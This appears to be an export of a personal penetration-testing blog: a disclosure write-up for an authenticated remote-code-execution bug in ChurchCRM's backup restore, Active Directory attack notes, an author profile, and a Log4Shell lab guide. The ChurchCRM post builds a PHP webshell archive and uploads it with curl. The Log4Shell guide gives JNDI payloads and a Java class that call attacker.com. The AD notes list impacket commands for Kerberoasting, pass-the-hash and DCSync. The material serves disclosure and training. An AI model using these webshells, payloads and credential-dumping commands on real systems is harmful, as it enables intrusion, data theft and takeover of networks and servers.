[{"content":" ⚠️ Disclaimer: This article is for educational purposes only. Test only on systems you are authorized to test.\nAffected Systems Impact Vulnerability Type ChurchCRM Critical 9.1 Remote Code Execution Introduction Hello everyone. In this article, I\u0026rsquo;m going to walk you through how I managed to find the CVE-2026-40484 vulnerability from the very first moment all the way to the point where it was officially registered and published in the MITRE database.\nGetting Started To get the highest-level Turkish accreditation, one of the requirements is that I must have at least one CVE registered under my name. So I had to start a journey looking for systems where I could grab a CVE as quickly as possible.\nI headed over to GitHub and started browsing through projects that actually care about security in their development. My eyes landed on a project called ChurchCRM.\nWhen I went through the previously discovered vulnerabilities in the project, I noticed that someone had already reported a Remote Code Execution vulnerability. Here\u0026rsquo;s the link to the vulnerability that was discovered before I even started my own research on this project:\nhttps://github.com/ChurchCRM/CRM/security/advisories/GHSA-pqm7-g8px-9r77\nIt was reported on December 17, 2025.\nThere\u0026rsquo;s a key point every security researcher should keep in mind: vulnerabilities that have been patched can actually open the door to discovering new ones. That\u0026rsquo;s why these spots are among the most important places to focus on. Don\u0026rsquo;t fall into the trap of thinking \u0026ldquo;a vulnerability was already found and fixed here, so there\u0026rsquo;s nothing else to look for.\u0026rdquo; That\u0026rsquo;s completely wrong. 
On the contrary, I\u0026rsquo;d advise you to make it the very first place you look when hunting for bugs.\nBased on that, I started trying to locate this function inside the project and study it for any potential vulnerabilities.\nUsing some filtering commands and browsing through the project\u0026rsquo;s folders and files, I found a backup folder inside it, which contained several files written in PHP.\nAfter analyzing these files and understanding the functions inside them, I successfully reached a vulnerability that leads to Remote Code Execution once again. Let\u0026rsquo;s go through the details of this vulnerability together.\nVulnerability Details ChurchCRM version 7.1.1 contains a critical security vulnerability in the database backup restoration function. When an administrator uploads a backup archive file (.tar.gz) to restore it, the application extracts the archive and copies the contents of the Images/ folder directly into the web-accessible document root, using the function FileSystemUtils::recursiveCopyDirectory().\nThe problem is that this function performs no filtering whatsoever on file extensions during the copy operation. So an attacker who crafts a malicious backup archive in .tar.gz format containing a malicious PHP script inside the Images/ folder can make the application write that file into a publicly accessible path under /Images/Person/ or /Images/Family/. 
Once written, the attacker can send HTTP requests to the created file to execute arbitrary operating system commands with the privileges of the web server process (www-data).\nTo understand this better, let\u0026rsquo;s dive into analyzing the file where the vulnerability was found.\nVulnerability Location File name: RestoreJob.php Vulnerable line: 138 Helper file: FileSystemUtils.php Vulnerable function: FileSystemUtils::recursiveCopyDirectory() Reading the File Reading RestoreJob.php To understand what it does, let\u0026rsquo;s break it down line by line:\nLine 122: Writes to the log that it has started restoring the backup. Line 123: Opens the backup file (the archive). Line 126: Prepares a temporary folder path with a random name to extract the files into. Line 127: Actually creates the folder on the filesystem. Line 130: Dumps all the contents of the compressed file into this temporary folder. Line 132: Identifies the location of the database file (SQL) inside the extracted files. Line 133: Verifies that the database file actually exists. Line 134: Starts loading the new data file into the system. Line 136: Deletes all the existing old images located at: SystemURLs::getDocumentRoot() . '/Images' Line 138: Takes the images from the temporary folder and sends them to the final location of the site, which is: SystemURLs::getImagesRoot() And here it calls the FileSystemUtils::recursiveCopyDirectory function, which handles copying the folder and everything inside it (files and images) recursively and automatically.\nLine 141: If the data file is not found, it throws an error message stating that the file is missing. So far, everything looks fine. 
After creating the folder, the code used the following function to handle the copying:\nFileSystemUtils::recursiveCopyDirectory When I tried to locate this function, here\u0026rsquo;s what I found:\nAs you can see, it\u0026rsquo;s located at this path.\nReading FileSystemUtils.php To understand the function, we need to see how it performs the copy operation. Going to line 24, we find the function itself, and we can analyze how it works as follows:\nLine 28: if (file_exists($dst)) Checks whether the destination path already exists on the server, to avoid overlap.\nLine 29: self::recursiveRemoveDirectory($dst); If it\u0026rsquo;s found, it wipes it out completely along with all its contents to prepare the place for the new copy.\nLine 31: if (is_dir($src)) Checks the source path; is it a folder? (If yes, it starts processing its contents).\nLine 32: mkdir($dst); Creates a new folder at the destination with the same name as the source folder.\nLine 33: $files = scandir($src); Opens the folder and reads the names of all files and directories inside it.\nLine 34: foreach ($files as $file) Starts a loop to iterate over every item found in the previous step.\nLine 35: if ($file != '.' \u0026amp;\u0026amp; $file != '..') Ignores the technical symbols that represent the current folder and the parent folder, to make sure we don\u0026rsquo;t fall into an infinite loop.\nLine 36: self::recursiveCopyDirectory(\u0026quot;$src/$file\u0026quot;, \u0026quot;$dst/$file\u0026quot;); Recursion: Here the function calls itself to go into subfolders and repeat the same steps on them.\nLine 39: } elseif (file_exists($src)) { If the path is not a folder, it verifies that it\u0026rsquo;s an actually existing file.\nLine 40: copy($src, $dst); Copies the file as-is from the source to the destination.\nSecurity Analysis 1. Blind Copy Operation\nThe function doesn\u0026rsquo;t ask \u0026ldquo;what am I copying?\u0026rdquo;, it just executes the copy command. 
There\u0026rsquo;s no check whatsoever on the file content (MIME Type), nor is there any verification of whether the file is a real image or a disguised piece of code.\n2. Absence of Extension Checks\nHere lies the real disaster; the function copies any file regardless of its extension. An attacker can stuff the backup file with dangerous files like:\n.php .phtml .phar .php5 Since the function has neither a \u0026ldquo;blacklist\u0026rdquo; nor a \u0026ldquo;whitelist\u0026rdquo; for extensions, it will transfer these files straight into the live folder of the site.\nAs an attacker, the first thing that comes to mind here is that you can upload malicious files with a PHP extension to fully take over the system :)\nExploitation Requirements From our understanding of the functions and how they work, we can now identify the requirements needed to successfully exploit this vulnerability:\n1. The presence of the database file (ChurchCRM-Database.sql)\nReason: As we saw in the previous code (lines 133 and 141), the system specifically checks for the existence of this file. Tactic: If the code doesn\u0026rsquo;t find this file, it will throw an exception, and the restore operation will stop immediately. So the attacker must include an SQL file (even if it\u0026rsquo;s empty or contains random data) to fool the system into continuing execution. 2. Bypassing the Extension Check (PHP Web Shell Injection)\nReason: The recursiveCopyDirectory function is blind; it copies everything. Tactic: The attacker places a shell.php file inside the images folder (/Images) within the compressed archive. Since the function has no blacklist for extensions, the shell will be extracted and placed in the live folder of the site. 3. Reaching the Live Path (Predictable Path)\nReason: The attacker needs to know where their file was placed. Tactic: Since we know the code copies files into SystemURLs::getImagesRoot(), the path is already known to the attacker in advance. 
And there\u0026rsquo;s one last thing we need to know: how can we actually invoke this function? That\u0026rsquo;s why we need to look inside the APIs for the request that allows us to trigger it.\nAnd from here it becomes clear that using the following path /api/database/restore, we can invoke this function and trigger it successfully.\nImpact Arbitrary operating system command execution with the privileges of the www-data user. Lateral movement within the server environment. A persistent backdoor; the dropped shell file remains even after the application is restarted. A complete compromise of the confidentiality, integrity, and availability of the CRM data. Proof of Concept First, we need to create a compressed file that contains:\nChurchCRM-Database.sql /Images/Person/shell.php We can use the following code to do that:\nmkdir -p evil_backup/Images/Person echo \u0026#34;SQL backup Test\u0026#34; \u0026gt; evil_backup_test/ChurchCRM-Database.sql # Create a PHP backdoor echo \u0026#39;\u0026lt;?php system($_GET[\u0026#34;cmd\u0026#34;]); ?\u0026gt;\u0026#39; \u0026gt; evil_backup_test/Images/Person/shell.php # Compress the file cd evil_backup tar -czf /tmp/evil_restore_test.tar.gz ChurchCRM-Database.sql Images/ File structure:\nChurchCRM-Database.sql Images/ Images/Person/ Images/Person/shell.php ← PHP webshell Second, uploading via the API:\ncurl -s \\ -b \u0026#34;CRM-SESSION=\u0026lt;session_cookie\u0026gt;\u0026#34; \\ \u0026#34;http://localhost/churchcrm/api/database/restore\u0026#34; \\ -X POST \\ -F \u0026#34;restoreFile=@/tmp/evil_restore_test.tar.gz;type=application/gzip\u0026#34; The server\u0026rsquo;s response will be as follows: HTTP 200\n{ \u0026#34;Messages\u0026#34;: [ \u0026#34;As part of the restore, external backups have been disabled...\u0026#34; ] } After that, the malicious file will be uploaded to the following path:\nImages/Person/shell.php And the moment we try to send a request to this location, we\u0026rsquo;ll see that we can execute 
remote code successfully!\ncurl \u0026#34;http://localhost/churchcrm/Images/Person/shell.php?cmd=id\u0026#34; Output:\nuid=33(www-data) gid=33(www-data) groups=33(www-data) Proof of Concept in Images 1. Creating the compressed file:\n2. Uploading the file and confirming a successful upload:\n3. Executing the id command:\nFixing the Vulnerability To fix the vulnerability, all the details and code have been added in the following commit:\nhttps://github.com/ChurchCRM/CRM/commit/68be1d12bc4cc1429575ae797ef05efe47030d39\nSources Authenticated Remote Code Execution via Unrestricted PHP File Write in Database Restore Function NIST-NVD: CVE-2026-40484 Detail The Hacker Wire: CVE-2026-40484 CVE: CVE-2026-40484 ","permalink":"https://cyberah-blog.pages.dev/en/cve/cve-2026-40484/","summary":"\u003cblockquote\u003e\n\u003cp\u003e⚠️ \u003cstrong\u003eDisclaimer:\u003c/strong\u003e This article is for educational purposes only. Test only on systems you are authorized to test.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ctable\u003e\n  \u003cthead\u003e\n      \u003ctr\u003e\n          \u003cth\u003eAffected Systems\u003c/th\u003e\n          \u003cth\u003eImpact\u003c/th\u003e\n          \u003cth\u003eVulnerability Type\u003c/th\u003e\n      \u003c/tr\u003e\n  \u003c/thead\u003e\n  \u003ctbody\u003e\n      \u003ctr\u003e\n          \u003ctd\u003eChurchCRM\u003c/td\u003e\n          \u003ctd\u003e\u003ccode\u003eCritical 9.1\u003c/code\u003e\u003c/td\u003e\n          \u003ctd\u003eRemote Code Execution\u003c/td\u003e\n      \u003c/tr\u003e\n  \u003c/tbody\u003e\n\u003c/table\u003e\n\u003ch2 id=\"introduction\"\u003eIntroduction\u003c/h2\u003e\n\u003cp\u003eHello everyone. 
In this article, I\u0026rsquo;m going to walk you through how I managed to find the \u003cstrong\u003eCVE-2026-40484\u003c/strong\u003e vulnerability from the very first moment all the way to the point where it was officially registered and published in the \u003cstrong\u003eMITRE\u003c/strong\u003e database.\u003c/p\u003e","title":"How I Found a Remote Code Execution Vulnerability in the Database Restore Function - CVE-2026-40484"},{"content":"Active Directory (AD) is a centralized directory service developed by Microsoft for managing users, computers, and permissions in Windows networks.\nKerberos Authentication Kerberos is the primary authentication protocol in Active Directory. It uses a ticket-based system instead of sending passwords over the network.\nHow Does It Work? Client ──AS-REQ──\u0026gt; KDC Client \u0026lt;─AS-REP── TGT (encrypted with krbtgt key) Client ──TGS-REQ─\u0026gt; KDC Client \u0026lt;─TGS-REP─ TGS (service ticket) Client ──────────\u0026gt; Service (using TGS) # View current tickets klist # Request a service ticket kinit -S cifs/fileserver.corp.local user@CORP.LOCAL Key point: TGT is valid for 10 hours by default. 
If stolen, it can be used until expiry.\nNTLM Authentication NTLM is an older protocol still used when connecting to machines outside the domain or via direct IP.\nChallenge-Response Flow Client ──NEGOTIATE──\u0026gt; Server Client \u0026lt;─CHALLENGE── nonce (random value) Client ──RESPONSE──\u0026gt; Hash(nonce + password) # Check authentication protocol used Get-WinEvent -LogName Security | Where-Object {$_.Id -eq 4624} | Select-Object -First 5 Key difference: NTLM is weaker than Kerberos — it doesn\u0026rsquo;t support Mutual Authentication.\n","permalink":"https://cyberah-blog.pages.dev/en/notes/active-directory/what-is-ad/","summary":"\u003cp\u003eActive Directory (AD) is a centralized directory service developed by Microsoft for managing users, computers, and permissions in Windows networks.\u003c/p\u003e\n\u003ch2 id=\"kerberos-authentication\"\u003eKerberos Authentication\u003c/h2\u003e\n\u003cp\u003eKerberos is the primary authentication protocol in Active Directory. It uses a \u003cstrong\u003eticket-based\u003c/strong\u003e system instead of sending passwords over the network.\u003c/p\u003e\n\u003ch3 id=\"how-does-it-work\"\u003eHow Does It Work?\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-fallback\" data-lang=\"fallback\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eClient   ──AS-REQ──\u0026gt;  KDC\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eClient   \u0026lt;─AS-REP──   TGT (encrypted with krbtgt key)\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eClient   ──TGS-REQ─\u0026gt;  KDC\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eClient   \u0026lt;─TGS-REP─   TGS (service ticket)\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eClient   ──────────\u0026gt;  
Service (using TGS)\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# View current tickets\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eklist\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Request a service ticket\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ekinit -S cifs/fileserver.corp.local user@CORP.LOCAL\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003eKey point:\u003c/strong\u003e TGT is valid for 10 hours by default. If stolen, it can be used until expiry.\u003c/p\u003e","title":"What is Active Directory?"},{"content":"Most internal penetration tests end with targeting Active Directory. 
This guide covers the essential attacks.\nKerberos Attacks Kerberoasting Targets Service Principal Names (SPNs) to extract service tickets and crack them offline.\n# Extract service account tickets impacket-GetUserSPNs corp.local/user:pass -dc-ip 10.10.10.1 -request -outputfile hashes.txt # Crack offline hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt AS-REP Roasting Targets accounts with Pre-Authentication disabled.\n# Find vulnerable accounts impacket-GetNPUsers corp.local/ -dc-ip 10.10.10.1 -no-pass -usersfile users.txt Privilege Escalation in Active Directory Pass-the-Hash # Use NTLM hash to authenticate without the plaintext password impacket-psexec -hashes :NTLM_HASH Administrator@10.10.10.2 DCSync — Dump All Hashes # Requires Domain Admin or DCSync rights impacket-secretsdump corp.local/admin:pass@dc.corp.local -just-dc Warning: Use these tools in authorized test environments only.\n","permalink":"https://cyberah-blog.pages.dev/en/notes/active-directory/ad-attacks/","summary":"\u003cp\u003eMost internal penetration tests end with targeting Active Directory. 
This guide covers the essential attacks.\u003c/p\u003e\n\u003ch2 id=\"kerberos-attacks\"\u003eKerberos Attacks\u003c/h2\u003e\n\u003ch3 id=\"kerberoasting\"\u003eKerberoasting\u003c/h3\u003e\n\u003cp\u003eTargets \u003cstrong\u003eService Principal Names (SPNs)\u003c/strong\u003e to extract service tickets and crack them offline.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Extract service account tickets\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eimpacket-GetUserSPNs corp.local/user:pass -dc-ip 10.10.10.1 -request -outputfile hashes.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Crack offline\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ehashcat -m \u003cspan class=\"m\"\u003e13100\u003c/span\u003e hashes.txt /usr/share/wordlists/rockyou.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"as-rep-roasting\"\u003eAS-REP Roasting\u003c/h3\u003e\n\u003cp\u003eTargets accounts with \u003cstrong\u003ePre-Authentication disabled\u003c/strong\u003e.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Find vulnerable accounts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eimpacket-GetNPUsers corp.local/ -dc-ip 10.10.10.1 -no-pass -usersfile 
users.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"privilege-escalation-in-active-directory\"\u003ePrivilege Escalation in Active Directory\u003c/h2\u003e\n\u003ch3 id=\"pass-the-hash\"\u003ePass-the-Hash\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Use NTLM hash to authenticate without the plaintext password\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eimpacket-psexec -hashes :NTLM_HASH Administrator@10.10.10.2\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"dcsync--dump-all-hashes\"\u003eDCSync — Dump All Hashes\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Requires Domain Admin or DCSync rights\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eimpacket-secretsdump corp.local/admin:pass@dc.corp.local -just-dc\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003eWarning:\u003c/strong\u003e Use these tools in authorized test environments only.\u003c/p\u003e","title":"Attack Active Directory"},{"content":"Lateral movement means pivoting from one compromised machine to another inside the network.\nPsExec Classic remote execution tool.\nimpacket-psexec corp.local/admin:pass@10.10.10.2 cmd.exe WMI Exec Quieter alternative to PsExec, less likely to trigger AV.\nimpacket-wmiexec corp.local/admin:pass@10.10.10.2 SMB / Pass-the-Hash # No plaintext password 
needed — NTLM hash is enough crackmapexec smb 10.10.10.0/24 -u admin -H NTLM_HASH Note: These tools leave traces in Windows Event Logs (4624, 4648).\n","permalink":"https://cyberah-blog.pages.dev/en/notes/active-directory/lateral-movement/","summary":"\u003cp\u003eLateral movement means pivoting from one compromised machine to another inside the network.\u003c/p\u003e\n\u003ch2 id=\"psexec\"\u003ePsExec\u003c/h2\u003e\n\u003cp\u003eClassic remote execution tool.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eimpacket-psexec corp.local/admin:pass@10.10.10.2 cmd.exe\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"wmi-exec\"\u003eWMI Exec\u003c/h2\u003e\n\u003cp\u003eQuieter alternative to PsExec, less likely to trigger AV.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eimpacket-wmiexec corp.local/admin:pass@10.10.10.2\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"smb--pass-the-hash\"\u003eSMB / Pass-the-Hash\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# No plaintext password needed — NTLM hash is enough\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecrackmapexec smb 10.10.10.0/24 -u admin -H NTLM_HASH\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003eNote:\u003c/strong\u003e These tools 
leave traces in Windows Event Logs (4624, 4648).\u003c/p\u003e\n\u003c/blockquote\u003e","title":"Lateral Movement in AD Networks"},{"content":"BloodHound analyzes Active Directory relationships and maps the shortest path to Domain Admin.\nCollecting Data # SharpHound — collect from domain ./SharpHound.exe -c All # Python (no execution on target required) bloodhound-python -u user -p pass -d corp.local -dc dc.corp.local -c All Analyzing Results After uploading ZIP files to BloodHound GUI:\nFind Shortest Path to Domain Admin Look for ACL Abuse paths Check Kerberoastable Users Tip: BloodHound saves hours of manual analysis and reveals non-obvious attack paths.\n","permalink":"https://cyberah-blog.pages.dev/en/notes/active-directory/bloodhound/","summary":"\u003cp\u003eBloodHound analyzes Active Directory relationships and maps the shortest path to Domain Admin.\u003c/p\u003e\n\u003ch2 id=\"collecting-data\"\u003eCollecting Data\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# SharpHound — collect from domain\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e./SharpHound.exe -c All\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Python (no execution on target required)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ebloodhound-python -u user -p pass -d corp.local -dc dc.corp.local -c All\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"analyzing-results\"\u003eAnalyzing Results\u003c/h2\u003e\n\u003cp\u003eAfter uploading ZIP 
files to BloodHound GUI:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eFind \u003cstrong\u003eShortest Path to Domain Admin\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003eLook for \u003cstrong\u003eACL Abuse\u003c/strong\u003e paths\u003c/li\u003e\n\u003cli\u003eCheck \u003cstrong\u003eKerberoastable Users\u003c/strong\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003eTip:\u003c/strong\u003e BloodHound saves hours of manual analysis and reveals non-obvious attack paths.\u003c/p\u003e","title":"BloodHound — Mapping Attack Paths"},{"content":"","permalink":"https://cyberah-blog.pages.dev/en/stats/","summary":"","title":"Blog Statistics"},{"content":"","permalink":"https://cyberah-blog.pages.dev/en/hall-of-fame/","summary":"","title":"Hall of Fame"},{"content":" ⚡ Cyberah Ayham Othman — Penetration Tester | Security Researcher | Trainer 5+ CVEs OSCP OSWE 3+ Years Experience About Ayham Othman, known as Cyberah in the cybersecurity community, is a seasoned penetration tester with over three years of hands-on experience executing advanced penetration tests and Red Team operations for local and international organizations.\nHe holds globally recognized certifications including OSCP, OSWE, and eWPTXv2, along with the Turkish Standards Institution cybersecurity certification. He also has a strong vulnerability research record with 5+ published CVEs, including critical Remote Code Execution findings.\nBeyond fieldwork, Ayham is a trainer and speaker — having trained hundreds of students and delivered talks at conferences in Turkey, Yemen, and Syria. 
He actively creates educational content on YouTube and Instagram.\n🏆 Certifications OSCP Offensive Security Certified Professional OSWE Offensive Security Web Expert eWPTXv2 eLearnSecurity Web Application Penetration Tester eXtreme CRTO Certified Red Team Operator TSE — Sızma Testi Uzmanı Turkish Standards Institution — Penetration Testing Expert 🔴 Published CVEs CVE-2026-40484 RCE — Critical Remote Code Execution CVE-2026-40483 CVE CVE-2026-40485 CVE CVE-2026-40581 CVE CVE-2026-40593 CVE 🚩 CTF Competitions 🇸🇦 BlackHat Saudi Arabia — Final 2025 Saudi Arabia Finalist 🇹🇷 Konya HackMe CTF Konya, Turkey Competitor 🎤 Speaking \u0026 Talks 🇹🇷 Atlas University — Istanbul, Turkey Cyber 101 — Introduction to Cybersecurity 🇹🇷 Ibtikar Assembly — Turkey Cyber 101 — Introduction to Cybersecurity 🇹🇷 Ibtikar Assembly — Turkey Applied Hacking — Hands-on Offensive Security 🇹🇷 Gelişim University — Turkey Cyber 101 — Introduction to Cybersecurity 🇹🇷 ENG Pi — Engineering Students, Turkey How to Start in Offensive Security — Q\u0026A Session 🇾🇪 Dev Zone — Yemen Social Engineering — Tactics \u0026 Awareness Sanad — Syria Cyber 101 + What is OSCP \u0026 How to Get It 📚 Publications \u0026 Courses 📖 The Complete Guide to Nmap Technical book in 8 parts — comprehensive coverage of Nmap 🎓 OSCP Prep Full Course 4 parts | 40+ hours of video \u0026 practical labs | ZeroStrike Academy academy.zerostrike.net ↗ 🌐 Contact ayhanbasyildiz@gmail.com YouTube Instagram X (Twitter) LinkedIn GitHub ","permalink":"https://cyberah-blog.pages.dev/en/about/","summary":"\u003cdiv class=\"cv-profile\"\u003e\n  \u003cdiv class=\"cv-profile-avatar\"\u003e⚡\u003c/div\u003e\n  \u003cdiv class=\"cv-profile-info\"\u003e\n    \u003cdiv class=\"cv-profile-name\"\u003eCyberah\u003c/div\u003e\n    \u003cdiv class=\"cv-profile-title\"\u003eAyham Othman — Penetration Tester | Security Researcher | Trainer\u003c/div\u003e\n    \u003cdiv class=\"cv-profile-tags\"\u003e\n      \u003cspan class=\"cv-tag red\"\u003e5+ 
CVEs\u003c/span\u003e\n      \u003cspan class=\"cv-tag\"\u003eOSCP\u003c/span\u003e\n      \u003cspan class=\"cv-tag\"\u003eOSWE\u003c/span\u003e\n      \u003cspan class=\"cv-tag\"\u003e3+ Years Experience\u003c/span\u003e\n    \u003c/div\u003e\n  \u003c/div\u003e\n\u003c/div\u003e\n\u003chr\u003e\n\u003ch2 id=\"about\"\u003eAbout\u003c/h2\u003e\n\u003cp\u003eAyham Othman, known as \u003cstrong\u003eCyberah\u003c/strong\u003e in the cybersecurity community, is a seasoned penetration tester with over three years of hands-on experience executing advanced penetration tests and Red Team operations for local and international organizations.\u003c/p\u003e\n\u003cp\u003eHe holds globally recognized certifications including OSCP, OSWE, and eWPTXv2, along with the Turkish Standards Institution cybersecurity certification. He also has a strong vulnerability research record with 5+ published CVEs, including critical Remote Code Execution findings.\u003c/p\u003e","title":"About Me"},{"content":" ⚠️ Disclaimer: This article is for educational purposes only. Only test on systems you have explicit authorization to test.\nOverview Vulnerability Type: Remote Code Execution (RCE) via JNDI Injection Impact: Critical (CVSS 10.0) Affected Systems: Apache Log4j 2.0-beta9 to 2.14.1\nHow the Vulnerability Works Understanding JNDI JNDI (Java Naming and Directory Interface) is a Java API for connecting to directory services like LDAP.\nThe problem: Log4j would interpret user input and fetch external resources:\nUser-Agent: ${jndi:ldap://attacker.com/exploit} When Log4j logged this value, it would:\nSee ${jndi:...} Connect to the attacker\u0026rsquo;s LDAP server Download and execute a malicious Java class! 
Exploitation (Lab Environment Only) Set Up Vulnerable Lab docker pull ghcr.io/christophetd/log4shell-vulnerable-app docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app LDAP Redirect Server java -cp marshalsec-all.jar \\ marshalsec.jndi.LDAPRefServer \u0026#34;http://attacker-ip:8888/#Exploit\u0026#34; Malicious Java Payload public class Exploit { static { try { Runtime.getRuntime().exec(\u0026#34;curl attacker.com/callback\u0026#34;); } catch (Exception e) { e.printStackTrace(); } } } javac Exploit.java python3 -m http.server 8888 Trigger the Exploit curl -H \u0026#39;X-Api-Version: ${jndi:ldap://attacker.com:1389/exploit}\u0026#39; \\ http://target:8080/ curl -A \u0026#39;${jndi:ldap://attacker.com:1389/exploit}\u0026#39; http://target:8080/ Detection # Search logs for exploitation attempts grep -E \u0026#39;\\$\\{jndi:(ldap|rmi|dns|corba)://\u0026#39; /var/log/app/*.log # Broader regex grep -iE \u0026#39;\\$\\{[^\\}]*j[^\\}]*n[^\\}]*d[^\\}]*i[^\\}]*:\u0026#39; /var/log/*.log Mitigation # Immediate — disable JNDI lookups java -Dlog4j2.formatMsgNoLookups=true -jar application.jar \u0026lt;!-- Permanent — update Log4j dependency --\u0026gt; \u0026lt;dependency\u0026gt; \u0026lt;groupId\u0026gt;org.apache.logging.log4j\u0026lt;/groupId\u0026gt; \u0026lt;artifactId\u0026gt;log4j-core\u0026lt;/artifactId\u0026gt; 